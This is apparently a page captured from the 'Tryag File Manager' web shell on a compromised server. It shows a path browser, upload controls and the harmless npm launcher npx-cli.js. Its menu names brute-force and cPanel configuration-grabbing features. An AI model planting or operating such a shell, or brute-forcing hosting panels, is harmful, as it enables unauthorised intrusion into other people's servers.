Tryag File Manager
Home
||
Turbo Force
||
B-F Config_Cpanel
Current Path :
/
opt
/
alt
/
alt-nodejs10
/
root
/
lib
/
node_modules
/
npm
/
bin
/
Or
Select Your Path :
Upload File :
New :
File
Dir
//opt/alt/alt-nodejs10/root/lib/node_modules/npm/bin/npx-cli.js
#!/opt/alt/alt-nodejs10/root/usr/bin/node const npx = require('libnpx') const path = require('path') const NPM_PATH = path.join(__dirname, 'npm-cli.js') npx(npx.parseArgs(process.argv, NPM_PATH))